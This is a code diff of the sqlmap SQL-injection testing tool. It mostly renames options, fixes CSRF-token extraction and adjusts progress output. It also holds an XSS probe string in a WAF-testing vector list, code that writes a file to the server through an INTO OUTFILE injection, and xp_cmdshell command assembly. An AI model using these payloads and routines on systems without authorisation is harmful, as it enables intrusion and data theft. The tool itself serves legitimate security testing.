r"\[Microsoft\]\[ODBC SQL Server Driver\]\[SQL Server\](?P<result>[^<]+)",
r"<b>[^<]*(fatal|error|warning|exception)[^<]*</b>:?\s*(?P<result>.+?)<br\s*/?\s*>", r"<b>[^<]*(fatal|error|warning|exception)[^<]*</b>:?\s*(?P<result>.+?)<br\s*/?\s*>",
r"(?m)^\s*(fatal|error|warning|exception):?\s*(?P<result>[^\n]+?)$", r"(?m)^\s*(fatal|error|warning|exception):?\s*(?P<result>[^\n]+?)$",
r"(?P<result>[^\n>]*SQL Syntax[^\n<]+)", r"(?P<result>[^\n>]*SQL Syntax[^\n<]+)",
@@ -367,7 +371,7 @@ URI_INJECTABLE_REGEX = r"//[^/]*/([^\.*?]+)\Z"
SENSITIVE_DATA_REGEX = r"(\s|=)(?P<result>[^\s=]*%s[^\s]*)\s" SENSITIVE_DATA_REGEX = r"(\s|=)(?P<result>[^\s=]*%s[^\s]*)\s"
# Options to explicitly mask in anonymous (unhandled exception) reports (along with anything carrying the <hostname> inside) # Options to explicitly mask in anonymous (unhandled exception) reports (along with anything carrying the <hostname> inside)
SENSITIVE_OPTIONS = ("hostname", "answers", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "rFile", "wFile", "dFile", "testParameter", "authCred") SENSITIVE_OPTIONS = ("hostname", "answers", "data", "dnsDomain", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy", "fileRead", "fileWrite", "fileDest", "testParameter", "authCred")
# Maximum number of threads (avoiding connection issues and/or DoS) # Maximum number of threads (avoiding connection issues and/or DoS)
MAX_NUMBER_OF_THREADS = 10 MAX_NUMBER_OF_THREADS = 10
@@ -406,7 +410,7 @@ REFLECTED_VALUE_MARKER = "__REFLECTED_VALUE__"
REFLECTED_BORDER_REGEX = r"[^A-Za-z]+" REFLECTED_BORDER_REGEX = r"[^A-Za-z]+"
# Regular expression used for replacing non-alphanum characters # Regular expression used for replacing non-alphanum characters
REFLECTED_REPLACEMENT_REGEX = r".+" REFLECTED_REPLACEMENT_REGEX = r"[^\n]{1,100}"
# Maximum time (in seconds) spent per reflective value(s) replacement # Maximum time (in seconds) spent per reflective value(s) replacement
REFLECTED_REPLACEMENT_TIMEOUT = 3 REFLECTED_REPLACEMENT_TIMEOUT = 3
@@ -426,6 +430,9 @@ DEFAULT_MSSQL_SCHEMA = "dbo"
# Display hash attack info every mod number of items # Display hash attack info every mod number of items
HASH_MOD_ITEM_DISPLAY = 11 HASH_MOD_ITEM_DISPLAY = 11
# Display marker for (cracked) empty password
HASH_EMPTY_PASSWORD_MARKER = "<empty>"
# Maximum integer value # Maximum integer value
MAX_INT = sys.maxint MAX_INT = sys.maxint
@@ -524,7 +531,7 @@ CHECK_INTERNET_ADDRESS = "https://ipinfo.io/"
# Value to look for in response to CHECK_INTERNET_ADDRESS # Value to look for in response to CHECK_INTERNET_ADDRESS
CHECK_INTERNET_VALUE = "IP Address Details" CHECK_INTERNET_VALUE = "IP Address Details"
# Vectors used for provoking specific WAF/IPS/IDS behavior(s) # Vectors used for provoking specific WAF/IPS behavior(s)
WAF_ATTACK_VECTORS = ( WAF_ATTACK_VECTORS = (
"", # NIL "", # NIL
"search=<script>alert(1)</script>", "search=<script>alert(1)</script>",
@@ -748,7 +755,7 @@ EVALCODE_KEYWORD_SUFFIX = "_KEYWORD"
NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File." NETSCAPE_FORMAT_HEADER_COOKIES = "# Netscape HTTP Cookie File."
# Infixes used for automatic recognition of parameters carrying anti-CSRF tokens # Infixes used for automatic recognition of parameters carrying anti-CSRF tokens
CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf") CSRF_TOKEN_PARAMETER_INFIXES = ("csrf", "xsrf", "token")
# Prefixes used in brute force search for web server document root # Prefixes used in brute force search for web server document root
BRUTE_DOC_ROOT_PREFIXES = { BRUTE_DOC_ROOT_PREFIXES = {
@@ -786,9 +793,9 @@ tr:nth-child(even) {
background-color: #D3DFEE background-color: #D3DFEE
} }
td{ td{
font-size:10px; font-size:12px;
} }
th{ th{
font-size:10px; font-size:12px;
} }
</style>""" </style>"""

View File

@@ -5,7 +5,6 @@ Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission See the file 'LICENSE' for copying permission
""" """
import codecs
import functools import functools
import os import os
import re import re
@@ -571,7 +570,7 @@ def _createFilesDir():
Create the file directory. Create the file directory.
""" """
if not conf.rFile: if not conf.fileRead:
return return
conf.filePath = paths.SQLMAP_FILES_PATH % conf.hostname conf.filePath = paths.SQLMAP_FILES_PATH % conf.hostname
@@ -671,8 +670,10 @@ def _createTargetDirs():
conf.outputPath = tempDir conf.outputPath = tempDir
conf.outputPath = getUnicode(conf.outputPath)
try: try:
with codecs.open(os.path.join(conf.outputPath, "target.txt"), "w+", UNICODE_ENCODING) as f: with openFile(os.path.join(conf.outputPath, "target.txt"), "w+") as f:
f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname) f.write(kb.originalUrls.get(conf.url) or conf.url or conf.hostname)
f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET)) f.write(" (%s)" % (HTTPMETHOD.POST if conf.data else HTTPMETHOD.GET))
f.write(" # %s" % getUnicode(subprocess.list2cmdline(sys.argv), encoding=sys.stdin.encoding)) f.write(" # %s" % getUnicode(subprocess.list2cmdline(sys.argv), encoding=sys.stdin.encoding))
@@ -691,6 +692,13 @@ def _createTargetDirs():
_createFilesDir() _createFilesDir()
_configureDumper() _configureDumper()
def _setAuxOptions():
"""
Setup auxiliary (host-dependent) options
"""
kb.aliasName = randomStr(seed=hash(conf.hostname or ""))
def _restoreMergedOptions(): def _restoreMergedOptions():
""" """
Restore merged options (command line, configuration file and default values) Restore merged options (command line, configuration file and default values)
@@ -744,3 +752,4 @@ def setupTargetEnv():
_resumeHashDBValues() _resumeHashDBValues()
_setResultsFile() _setResultsFile()
_setAuthCred() _setAuthCred()
_setAuxOptions()

View File

@@ -95,7 +95,7 @@ def exceptionHandledFunction(threadFunction, silent=False):
if not silent: if not silent:
logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message)) logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))
if conf.verbose > 1: if conf.get("verbose") > 1:
traceback.print_exc() traceback.print_exc()
def setDaemon(thread): def setDaemon(thread):
@@ -168,6 +168,7 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
except (KeyboardInterrupt, SqlmapUserQuitException), ex: except (KeyboardInterrupt, SqlmapUserQuitException), ex:
print print
kb.prependFlag = False
kb.threadContinue = False kb.threadContinue = False
kb.threadException = True kb.threadException = True
@@ -188,7 +189,7 @@ def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardExceptio
kb.threadException = True kb.threadException = True
logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message)) logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))
if conf.verbose > 1: if conf.get("verbose") > 1:
traceback.print_exc() traceback.print_exc()
except: except:

View File

@@ -17,6 +17,7 @@ import zipfile
from lib.core.common import dataToStdout from lib.core.common import dataToStdout
from lib.core.common import getSafeExString from lib.core.common import getSafeExString
from lib.core.common import getLatestRevision
from lib.core.common import pollProcess from lib.core.common import pollProcess
from lib.core.common import readInput from lib.core.common import readInput
from lib.core.data import conf from lib.core.data import conf
@@ -25,6 +26,7 @@ from lib.core.data import paths
from lib.core.revision import getRevisionNumber from lib.core.revision import getRevisionNumber
from lib.core.settings import GIT_REPOSITORY from lib.core.settings import GIT_REPOSITORY
from lib.core.settings import IS_WIN from lib.core.settings import IS_WIN
from lib.core.settings import VERSION
from lib.core.settings import ZIPBALL_PAGE from lib.core.settings import ZIPBALL_PAGE
from lib.core.settings import UNICODE_ENCODING from lib.core.settings import UNICODE_ENCODING
@@ -39,6 +41,10 @@ def update():
warnMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY warnMsg += "from GitHub (e.g. 'git clone --depth 1 %s sqlmap')" % GIT_REPOSITORY
logger.warn(warnMsg) logger.warn(warnMsg)
if VERSION == getLatestRevision():
logger.info("already at the latest revision '%s'" % getRevisionNumber())
return
message = "do you want to try to fetch the latest 'zipball' from repository and extract it (experimental) ? [y/N]" message = "do you want to try to fetch the latest 'zipball' from repository and extract it (experimental) ? [y/N]"
if readInput(message, default='N', boolean=True): if readInput(message, default='N', boolean=True):
directory = os.path.abspath(paths.SQLMAP_ROOT_PATH) directory = os.path.abspath(paths.SQLMAP_ROOT_PATH)

View File

@@ -207,7 +207,7 @@ def cmdLineParser(argv=None):
help="Parameter used to hold anti-CSRF token") help="Parameter used to hold anti-CSRF token")
request.add_option("--csrf-url", dest="csrfUrl", request.add_option("--csrf-url", dest="csrfUrl",
help="URL address to visit to extract anti-CSRF token") help="URL address to visit for extraction of anti-CSRF token")
request.add_option("--force-ssl", dest="forceSSL", action="store_true", request.add_option("--force-ssl", dest="forceSSL", action="store_true",
help="Force usage of SSL/HTTPS") help="Force usage of SSL/HTTPS")
@@ -471,13 +471,13 @@ def cmdLineParser(argv=None):
# File system options # File system options
filesystem = OptionGroup(parser, "File system access", "These options can be used to access the back-end database management system underlying file system") filesystem = OptionGroup(parser, "File system access", "These options can be used to access the back-end database management system underlying file system")
filesystem.add_option("--file-read", dest="rFile", filesystem.add_option("--file-read", dest="fileRead",
help="Read a file from the back-end DBMS file system") help="Read a file from the back-end DBMS file system")
filesystem.add_option("--file-write", dest="wFile", filesystem.add_option("--file-write", dest="fileWrite",
help="Write a local file on the back-end DBMS file system") help="Write a local file on the back-end DBMS file system")
filesystem.add_option("--file-dest", dest="dFile", filesystem.add_option("--file-dest", dest="fileDest",
help="Back-end DBMS absolute filepath to write to") help="Back-end DBMS absolute filepath to write to")
# Takeover options # Takeover options
@@ -635,7 +635,10 @@ def cmdLineParser(argv=None):
help="Use Google dork results from specified page number") help="Use Google dork results from specified page number")
miscellaneous.add_option("--identify-waf", dest="identifyWaf", action="store_true", miscellaneous.add_option("--identify-waf", dest="identifyWaf", action="store_true",
help="Make a thorough testing for a WAF/IPS/IDS protection") help="Make a thorough testing for a WAF/IPS protection")
miscellaneous.add_option("--list-tampers", dest="listTampers", action="store_true",
help="Display list of available tamper scripts")
miscellaneous.add_option("--mobile", dest="mobile", action="store_true", miscellaneous.add_option("--mobile", dest="mobile", action="store_true",
help="Imitate smartphone through HTTP User-Agent header") help="Imitate smartphone through HTTP User-Agent header")
@@ -647,7 +650,7 @@ def cmdLineParser(argv=None):
help="Safely remove all content from sqlmap data directory") help="Safely remove all content from sqlmap data directory")
miscellaneous.add_option("--skip-waf", dest="skipWaf", action="store_true", miscellaneous.add_option("--skip-waf", dest="skipWaf", action="store_true",
help="Skip heuristic detection of WAF/IPS/IDS protection") help="Skip heuristic detection of WAF/IPS protection")
miscellaneous.add_option("--smart", dest="smart", action="store_true", miscellaneous.add_option("--smart", dest="smart", action="store_true",
help="Conduct thorough tests only if positive heuristic(s)") help="Conduct thorough tests only if positive heuristic(s)")
@@ -750,6 +753,7 @@ def cmdLineParser(argv=None):
prompt = False prompt = False
advancedHelp = True advancedHelp = True
extraHeaders = [] extraHeaders = []
tamperIndex = None
# Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING") # Reference: https://stackoverflow.com/a/4012683 (Note: previously used "...sys.getfilesystemencoding() or UNICODE_ENCODING")
for arg in argv: for arg in argv:
@@ -821,6 +825,12 @@ def cmdLineParser(argv=None):
elif re.search(r"\A-\w=.+", argv[i]): elif re.search(r"\A-\w=.+", argv[i]):
dataToStdout("[!] potentially miswritten (illegal '=') short option detected ('%s')\n" % argv[i]) dataToStdout("[!] potentially miswritten (illegal '=') short option detected ('%s')\n" % argv[i])
raise SystemExit raise SystemExit
elif argv[i].startswith("--tamper"):
if tamperIndex is None:
tamperIndex = i if '=' in argv[i] else (i + 1 if i + 1 < len(argv) and not argv[i + 1].startswith('-') else None)
else:
argv[tamperIndex] = "%s,%s" % (argv[tamperIndex], argv[i].split('=')[1] if '=' in argv[i] else (argv[i + 1] if i + 1 < len(argv) and not argv[i + 1].startswith('-') else ""))
argv[i] = ""
elif argv[i] == "-H": elif argv[i] == "-H":
if i + 1 < len(argv): if i + 1 < len(argv):
extraHeaders.append(argv[i + 1]) extraHeaders.append(argv[i + 1])
@@ -874,9 +884,9 @@ def cmdLineParser(argv=None):
if args.dummy: if args.dummy:
args.url = args.url or DUMMY_URL args.url = args.url or DUMMY_URL
if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purge, args.sitemapUrl)): if not any((args.direct, args.url, args.logFile, args.bulkFile, args.googleDork, args.configFile, args.requestFile, args.updateAll, args.smokeTest, args.liveTest, args.wizard, args.dependencies, args.purge, args.sitemapUrl, args.listTampers)):
errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --wizard, --update, --purge-output or --dependencies), " errMsg = "missing a mandatory option (-d, -u, -l, -m, -r, -g, -c, -x, --list-tampers, --wizard, --update, --purge or --dependencies). "
errMsg += "use -h for basic or -hh for advanced help\n" errMsg += "Use -h for basic and -hh for advanced help\n"
parser.error(errMsg) parser.error(errMsg)
return args return args

View File

@@ -6,6 +6,7 @@ See the file 'LICENSE' for copying permission
""" """
import os import os
import re
from xml.etree import ElementTree as et from xml.etree import ElementTree as et
@@ -17,6 +18,9 @@ from lib.core.exception import SqlmapInstallationException
from lib.core.settings import PAYLOAD_XML_FILES from lib.core.settings import PAYLOAD_XML_FILES
def cleanupVals(text, tag): def cleanupVals(text, tag):
if tag == "clause" and '-' in text:
text = re.sub(r"(\d+)-(\d+)", lambda match: ','.join(str(_) for _ in xrange(int(match.group(1)), int(match.group(2)) + 1)), text)
if tag in ("clause", "where"): if tag in ("clause", "where"):
text = text.split(',') text = text.split(',')

View File

@@ -137,10 +137,14 @@ def _comparison(page, headers, code, getRatioValue, pageLength):
seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "") seq1 = seq1.replace(REFLECTED_VALUE_MARKER, "")
seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "") seq2 = seq2.replace(REFLECTED_VALUE_MARKER, "")
if kb.heavilyDynamic:
seq1 = seq1.split("\n")
seq2 = seq2.split("\n")
seqMatcher.set_seq1(seq1) seqMatcher.set_seq1(seq1)
seqMatcher.set_seq2(seq2) seqMatcher.set_seq2(seq2)
ratio = round(seqMatcher.quick_ratio(), 3) ratio = round(seqMatcher.quick_ratio() if not kb.heavilyDynamic else seqMatcher.ratio(), 3)
# If the url is stable and we did not set yet the match ratio and the # If the url is stable and we did not set yet the match ratio and the
# current injected value changes the url page content # current injected value changes the url page content

View File

@@ -16,6 +16,7 @@ import string
import struct import struct
import time import time
import traceback import traceback
import urllib
import urllib2 import urllib2
import urlparse import urlparse
@@ -97,6 +98,7 @@ from lib.core.settings import MAX_CONSECUTIVE_CONNECTION_ERRORS
from lib.core.settings import MAX_MURPHY_SLEEP_TIME from lib.core.settings import MAX_MURPHY_SLEEP_TIME
from lib.core.settings import META_REFRESH_REGEX from lib.core.settings import META_REFRESH_REGEX
from lib.core.settings import MIN_TIME_RESPONSES from lib.core.settings import MIN_TIME_RESPONSES
from lib.core.settings import IDS_WAF_CHECK_PAYLOAD
from lib.core.settings import IS_WIN from lib.core.settings import IS_WIN
from lib.core.settings import LARGE_CHUNK_TRIM_MARKER from lib.core.settings import LARGE_CHUNK_TRIM_MARKER
from lib.core.settings import PAYLOAD_DELIMITER from lib.core.settings import PAYLOAD_DELIMITER
@@ -490,9 +492,10 @@ class Connect(object):
page = Connect._connReadProxy(conn) if not skipRead else None page = Connect._connReadProxy(conn) if not skipRead else None
if conn: if conn:
code = conn.code code = (code or conn.code) if conn.code == kb.originalCode else conn.code # do not override redirection code (for comparison purposes)
responseHeaders = conn.info() responseHeaders = conn.info()
responseHeaders[URI_HTTP_HEADER] = conn.geturl() responseHeaders[URI_HTTP_HEADER] = conn.geturl()
kb.serverHeader = responseHeaders.get(HTTP_HEADER.SERVER, kb.serverHeader)
else: else:
code = None code = None
responseHeaders = {} responseHeaders = {}
@@ -646,7 +649,7 @@ class Connect(object):
warnMsg = "connection was forcibly closed by the target URL" warnMsg = "connection was forcibly closed by the target URL"
elif "timed out" in tbMsg: elif "timed out" in tbMsg:
if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED): if kb.testMode and kb.testType not in (None, PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED):
singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is dropping 'suspicious' requests") singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests")
kb.droppingRequests = True kb.droppingRequests = True
warnMsg = "connection timed out to the target URL" warnMsg = "connection timed out to the target URL"
elif "Connection reset" in tbMsg: elif "Connection reset" in tbMsg:
@@ -655,7 +658,7 @@ class Connect(object):
conf.disablePrecon = True conf.disablePrecon = True
if kb.testMode: if kb.testMode:
singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS/IDS) is resetting 'suspicious' requests") singleTimeWarnMessage("there is a possibility that the target (or WAF/IPS) is resetting 'suspicious' requests")
kb.droppingRequests = True kb.droppingRequests = True
warnMsg = "connection reset to the target URL" warnMsg = "connection reset to the target URL"
elif "URLError" in tbMsg or "error" in tbMsg: elif "URLError" in tbMsg or "error" in tbMsg:
@@ -945,15 +948,27 @@ class Connect(object):
return retVal return retVal
page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST)) page, headers, code = Connect.getPage(url=conf.csrfUrl or conf.url, data=conf.data if conf.csrfUrl == conf.url else None, method=conf.method if conf.csrfUrl == conf.url else None, cookie=conf.parameters.get(PLACE.COOKIE), direct=True, silent=True, ua=conf.parameters.get(PLACE.USER_AGENT), referer=conf.parameters.get(PLACE.REFERER), host=conf.parameters.get(PLACE.HOST))
token = extractRegexResult(r"(?i)<input[^>]+\bname=[\"']?%s[\"']?[^>]*\bvalue=(?P<result>(\"([^\"]+)|'([^']+)|([^ >]+)))" % re.escape(conf.csrfToken), page or "") token = extractRegexResult(r"(?i)<input[^>]+\bname=[\"']?%s\b[^>]*\bvalue=[\"']?(?P<result>[^>'\"]*)" % re.escape(conf.csrfToken), page or "")
if not token: if not token:
token = extractRegexResult(r"(?i)<input[^>]+\bvalue=(?P<result>(\"([^\"]+)|'([^']+)|([^ >]+)))[^>]+\bname=[\"']?%s[\"']?" % re.escape(conf.csrfToken), page or "") token = extractRegexResult(r"(?i)<input[^>]+\bvalue=[\"']?(?P<result>[^>'\"]*)[\"']?[^>]*\bname=[\"']?%s\b" % re.escape(conf.csrfToken), page or "")
if not token: if not token:
match = re.search(r"%s[\"']:[\"']([^\"']+)" % re.escape(conf.csrfToken), page or "") match = re.search(r"%s[\"']:[\"']([^\"']+)" % re.escape(conf.csrfToken), page or "")
token = match.group(1) if match else None token = match.group(1) if match else None
if not token:
token = extractRegexResult(r"\b%s\s*[:=]\s*(?P<result>\w+)" % re.escape(conf.csrfToken), str(headers))
if not token:
token = extractRegexResult(r"\b%s\s*=\s*['\"]?(?P<result>[^;'\"]+)" % re.escape(conf.csrfToken), page or "")
if token:
match = re.search(r"String\.fromCharCode\(([\d+, ]+)\)", token)
if match:
token = "".join(chr(int(_)) for _ in match.group(1).replace(' ', "").split(','))
if not token: if not token:
if conf.csrfUrl != conf.url and code == httplib.OK: if conf.csrfUrl != conf.url and code == httplib.OK:
if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""): if headers and "text/plain" in headers.get(HTTP_HEADER.CONTENT_TYPE, ""):
@@ -1232,13 +1247,20 @@ class Connect(object):
warnMsg = "site returned insanely large response" warnMsg = "site returned insanely large response"
if kb.testMode: if kb.testMode:
warnMsg += " in testing phase. This is a common " warnMsg += " in testing phase. This is a common "
warnMsg += "behavior in custom WAF/IPS/IDS solutions" warnMsg += "behavior in custom WAF/IPS solutions"
singleTimeWarnMessage(warnMsg) singleTimeWarnMessage(warnMsg)
if conf.secondUrl: if conf.secondUrl:
page, headers, code = Connect.getPage(url=conf.secondUrl, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) page, headers, code = Connect.getPage(url=conf.secondUrl, cookie=cookie, ua=ua, silent=silent, auxHeaders=auxHeaders, response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True)
elif kb.secondReq: elif kb.secondReq and IDS_WAF_CHECK_PAYLOAD not in urllib.unquote(value or ""):
page, headers, code = Connect.getPage(url=kb.secondReq[0], post=kb.secondReq[2], method=kb.secondReq[1], cookie=kb.secondReq[3], silent=silent, auxHeaders=dict(auxHeaders, **dict(kb.secondReq[4])), response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True) def _(value):
if kb.customInjectionMark in (value or ""):
if payload is None:
value = value.replace(kb.customInjectionMark, "")
else:
value = re.sub(r"\w*%s" % re.escape(kb.customInjectionMark), payload, value)
return value
page, headers, code = Connect.getPage(url=_(kb.secondReq[0]), post=_(kb.secondReq[2]), method=kb.secondReq[1], cookie=kb.secondReq[3], silent=silent, auxHeaders=dict(auxHeaders, **dict(kb.secondReq[4])), response=response, raise404=False, ignoreTimeout=timeBasedCompare, refreshing=True)
threadData.lastQueryDuration = calculateDeltaSeconds(start) threadData.lastQueryDuration = calculateDeltaSeconds(start)
threadData.lastPage = page threadData.lastPage = page

View File

@@ -9,6 +9,8 @@ import httplib
import urllib2 import urllib2
from lib.core.data import conf from lib.core.data import conf
from lib.core.common import getSafeExString
from lib.core.exception import SqlmapConnectionException
class HTTPSPKIAuthHandler(urllib2.HTTPSHandler): class HTTPSPKIAuthHandler(urllib2.HTTPSHandler):
def __init__(self, auth_file): def __init__(self, auth_file):
@@ -19,5 +21,10 @@ class HTTPSPKIAuthHandler(urllib2.HTTPSHandler):
return self.do_open(self.getConnection, req) return self.do_open(self.getConnection, req)
def getConnection(self, host, timeout=None): def getConnection(self, host, timeout=None):
# Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain try:
return httplib.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout) # Reference: https://docs.python.org/2/library/ssl.html#ssl.SSLContext.load_cert_chain
return httplib.HTTPSConnection(host, cert_file=self.auth_file, key_file=self.auth_file, timeout=conf.timeout)
except IOError, ex:
errMsg = "error occurred while using key "
errMsg += "file '%s' ('%s')" % (self.auth_file, getSafeExString(ex))
raise SqlmapConnectionException(errMsg)

View File

@@ -108,7 +108,7 @@ class UDF:
return output return output
def udfCheckNeeded(self): def udfCheckNeeded(self):
if (not conf.rFile or (conf.rFile and not Backend.isDbms(DBMS.PGSQL))) and "sys_fileread" in self.sysUdfs: if (not conf.fileRead or (conf.fileRead and not Backend.isDbms(DBMS.PGSQL))) and "sys_fileread" in self.sysUdfs:
self.sysUdfs.pop("sys_fileread") self.sysUdfs.pop("sys_fileread")
if not conf.osPwn: if not conf.osPwn:

View File

@@ -146,8 +146,7 @@ class Web:
query += "OR %d=%d " % (randInt, randInt) query += "OR %d=%d " % (randInt, randInt)
query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery, conf.encoding)) query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery, conf.encoding))
query = agent.prefixQuery(query) query = agent.prefixQuery(query) # Note: No need for suffix as 'write_file_limit' already ends with comment (required)
query = agent.suffixQuery(query)
payload = agent.payload(newValue=query) payload = agent.payload(newValue=query)
page = Request.queryPage(payload) page = Request.queryPage(payload)

View File

@@ -136,7 +136,7 @@ class XP_cmdshell:
for line in lines: for line in lines:
echoedLine = "echo %s " % line echoedLine = "echo %s " % line
echoedLine += ">> \"%s\%s\"" % (tmpPath, randDestFile) echoedLine += ">> \"%s\\%s\"" % (tmpPath, randDestFile)
echoedLines.append(echoedLine) echoedLines.append(echoedLine)
for echoedLine in echoedLines: for echoedLine in echoedLines:

View File

@@ -472,7 +472,6 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
currentCharIndex = threadData.shared.index[0] currentCharIndex = threadData.shared.index[0]
if kb.threadContinue: if kb.threadContinue:
start = time.time()
val = getChar(currentCharIndex, asciiTbl, not(charsetType is None and conf.charset)) val = getChar(currentCharIndex, asciiTbl, not(charsetType is None and conf.charset))
if val is None: if val is None:
val = INFERENCE_UNKNOWN_CHAR val = INFERENCE_UNKNOWN_CHAR
@@ -485,7 +484,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
if kb.threadContinue: if kb.threadContinue:
if showEta: if showEta:
progress.progress(calculateDeltaSeconds(start), threadData.shared.index[0]) progress.progress(threadData.shared.index[0])
elif conf.verbose >= 1: elif conf.verbose >= 1:
startCharIndex = 0 startCharIndex = 0
endCharIndex = 0 endCharIndex = 0
@@ -502,7 +501,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
count = threadData.shared.start count = threadData.shared.start
for i in xrange(startCharIndex, endCharIndex + 1): for i in xrange(startCharIndex, endCharIndex + 1):
output += '_' if currentValue[i] is None else currentValue[i] output += '_' if currentValue[i] is None else filterControlChars(currentValue[i] if len(currentValue[i]) == 1 else ' ', replacement=' ')
for i in xrange(length): for i in xrange(length):
count += 1 if currentValue[i] is not None else 0 count += 1 if currentValue[i] is not None else 0
@@ -519,7 +518,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
status = ' %d/%d (%d%%)' % (_, length, int(100.0 * _ / length)) status = ' %d/%d (%d%%)' % (_, length, int(100.0 * _ / length))
output += status if _ != length else " " * len(status) output += status if _ != length else " " * len(status)
dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), filterControlChars(output))) dataToStdout("\r[%s] [INFO] retrieved: %s" % (time.strftime("%X"), output))
runThreads(numThreads, blindThread, startThreadMsg=False) runThreads(numThreads, blindThread, startThreadMsg=False)
@@ -553,7 +552,6 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
while True: while True:
index += 1 index += 1
start = time.time()
# Common prediction feature (a.k.a. "good samaritan") # Common prediction feature (a.k.a. "good samaritan")
# NOTE: to be used only when multi-threading is not set for # NOTE: to be used only when multi-threading is not set for
@@ -578,7 +576,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
# Did we have luck? # Did we have luck?
if result: if result:
if showEta: if showEta:
progress.progress(calculateDeltaSeconds(start), len(commonValue)) progress.progress(len(commonValue))
elif conf.verbose in (1, 2) or conf.api: elif conf.verbose in (1, 2) or conf.api:
dataToStdout(filterControlChars(commonValue[index - 1:])) dataToStdout(filterControlChars(commonValue[index - 1:]))
@@ -628,7 +626,7 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
threadData.shared.value = partialValue = partialValue + val threadData.shared.value = partialValue = partialValue + val
if showEta: if showEta:
progress.progress(calculateDeltaSeconds(start), index) progress.progress(index)
elif conf.verbose in (1, 2) or conf.api: elif conf.verbose in (1, 2) or conf.api:
dataToStdout(filterControlChars(val)) dataToStdout(filterControlChars(val))

View File

@@ -16,6 +16,7 @@ from lib.core.common import calculateDeltaSeconds
from lib.core.common import dataToStdout from lib.core.common import dataToStdout
from lib.core.common import decodeHexValue from lib.core.common import decodeHexValue
from lib.core.common import extractRegexResult from lib.core.common import extractRegexResult
from lib.core.common import firstNotNone
from lib.core.common import getConsoleWidth from lib.core.common import getConsoleWidth
from lib.core.common import getPartRun from lib.core.common import getPartRun
from lib.core.common import getUnicode from lib.core.common import getUnicode
@@ -102,7 +103,7 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
try: try:
while True: while True:
check = r"(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop) check = r"(?si)%s(?P<result>.*?)%s" % (kb.chars.start, kb.chars.stop)
trimcheck = r"(?si)%s(?P<result>[^<\n]*)" % kb.chars.start trimCheck = r"(?si)%s(?P<result>[^<\n]*)" % kb.chars.start
if field: if field:
nulledCastedField = agent.nullAndCastField(field) nulledCastedField = agent.nullAndCastField(field)
@@ -133,22 +134,21 @@ def _oneShotErrorUse(expression, field=None, chunkTest=False):
# Parse the returned page to get the exact error-based # Parse the returned page to get the exact error-based
# SQL injection output # SQL injection output
output = reduce(lambda x, y: x if x is not None else y, ( output = firstNotNone(
extractRegexResult(check, page), extractRegexResult(check, page),
extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None), extractRegexResult(check, threadData.lastHTTPError[2] if wasLastResponseHTTPError() else None),
extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)), extractRegexResult(check, listToStrValue((headers[header] for header in headers if header.lower() != HTTP_HEADER.URI.lower()) if headers else None)),
